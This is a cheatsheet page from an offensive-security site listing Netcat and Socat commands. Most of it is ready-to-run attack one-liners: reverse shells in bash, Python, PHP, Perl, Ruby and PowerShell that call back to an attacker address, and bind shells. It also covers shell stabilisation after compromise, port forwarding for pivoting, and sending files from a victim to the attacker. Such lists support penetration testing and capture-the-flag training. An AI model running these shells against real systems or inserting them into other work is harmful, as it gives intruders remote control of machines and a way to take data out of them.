← All Cheatsheets

exploitation

Netcat & Socat — Network Swiss Army Knife

Netcat and Socat for reverse shells, port forwarding, file transfer, and network debugging.

13 views Apr 2026 lazyhackers

Netcat Listeners & Connect (5)

nc -lvnp 4444

Start listener on port 4444

nc listen

nc -nv 10.10.10.1 4444

Connect to remote host:port

nc connect

nc -lvnp 4444 -e /bin/bash

Bind shell on Linux (listen)

nc bind shell

nc 10.10.14.1 4444 -e /bin/bash

Reverse shell to attacker (Linux)

nc reverse shell

nc 10.10.14.1 4444 -e cmd.exe

Reverse shell to attacker (Windows)

nc reverse shell windows

Reverse Shells (One-liners) (7)

bash -i >& /dev/tcp/10.10.14.1/4444 0>&1

Bash TCP reverse shell

bash reverse shell

bash -c "bash -i >& /dev/tcp/10.10.14.1/4444 0>&1"

Bash reverse shell (command injection safe)

bash reverse shell

python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\"10.10.14.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])"

Python3 reverse shell

python reverse shell

php -r "$sock=fsockopen(\"10.10.14.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");"

PHP reverse shell

php reverse shell

perl -e "use Socket;$i=\"10.10.14.1\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");"

Perl reverse shell

perl reverse shell

ruby -rsocket -e "f=TCPSocket.open(\"10.10.14.1\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)"

Ruby reverse shell

ruby reverse shell

powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient(\"10.10.14.1\",4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+\"PS \"+(pwd).Path+\"> \";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerShell reverse shell

powershell reverse shell windows

Shell Stabilisation (TTY) (5)

python3 -c "import pty;pty.spawn(\"/bin/bash\")"

Upgrade to PTY shell with Python

tty upgrade

python3 -c "import pty;pty.spawn(\"/bin/bash\")" && export TERM=xterm && Ctrl+Z && stty raw -echo; fg

Full TTY upgrade (raw mode)

tty upgrade full

script /dev/null -c bash

Upgrade shell using script command

tty upgrade

/usr/bin/script -qc /bin/bash /dev/null

Alternative shell upgrade with script

tty upgrade

stty rows 45 cols 180

Set terminal size in upgraded shell

tty size

Socat (6)

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

Socat bind shell listener

socat bind

socat TCP:10.10.14.1:4444 EXEC:/bin/bash

Socat reverse shell to attacker

socat reverse shell

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:"/bin/bash -li",pty,stderr,setsid,sigint,sane

Socat fully stable PTY listener

socat tty stable

socat TCP:10.10.14.1:4444 EXEC:"/bin/bash -li",pty,stderr,setsid,sigint,sane

Socat PTY reverse shell (no upgrade needed)

socat tty reverse

socat TCP-LISTEN:8080,fork TCP:10.10.10.1:80

Port forward: localhost:8080 → target:80

socat portfwd pivot

socat -d -d TCP-LISTEN:4444 STDOUT

Debug mode — verbose output

socat debug

File Transfer (4)

nc -lvnp 4444 > received_file

Receive file via netcat (attacker)

nc filetransfer

nc 10.10.14.1 4444 < file_to_send

Send file via netcat (victim)

nc filetransfer

socat TCP-LISTEN:4444,reuseaddr OPEN:received.txt,creat

Socat file receive

socat filetransfer

socat TCP:10.10.14.1:4444 FILE:send_me.txt

Socat file send

socat filetransfer